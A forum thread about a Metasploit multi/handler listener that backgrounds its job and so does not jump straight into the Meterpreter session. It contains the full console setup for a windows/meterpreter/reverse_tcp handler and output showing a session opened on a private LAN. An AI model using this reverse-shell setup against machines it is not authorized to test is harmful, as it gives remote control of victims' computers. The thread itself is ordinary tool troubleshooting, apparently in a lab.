Meterpreter/listener not working

.Gex.

Hi Guys,

I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup

v4.16.7

I have created a basic reverse_tcp payload with msfvenom, when I start my listener I do the following

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.8
LHOST => 192.168.0.8
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.8:4444 
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400

I am expecting to see a meterpreter but nothing...

What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed, once that happens the interpreter appears, but after I type exploit the console does not wait, I got straight back to msf exploit(handler) >

Any help much appreciated. 

Guess I'm a bit confused.  You got a connection.  You just have to select it. 

What's the line right after your session 1 opened line?  Is it just a blinking curser saying: msf exploit(handler) >?

From there just select your session which would be session 1 and interact with it.

Are you hoping that after typing exploit that it'll go right into the session?  The above snipit shows that when you started the exploit it backgrounded it which is why you stayed in the msf console rather than jumping right into a meterpreter session.  Did you type something before hand to force it to background?  Does this happen every time you run this now?

This seems to have happened  after I updated metasploit, I want the meterpreter to show as soon as the connection from the Target is made.

I changed the below which resolved the problem.

• edit modules/exploits/multi/handler.rb to remove 'Stance' => Msf::Exploit::Stance::Passive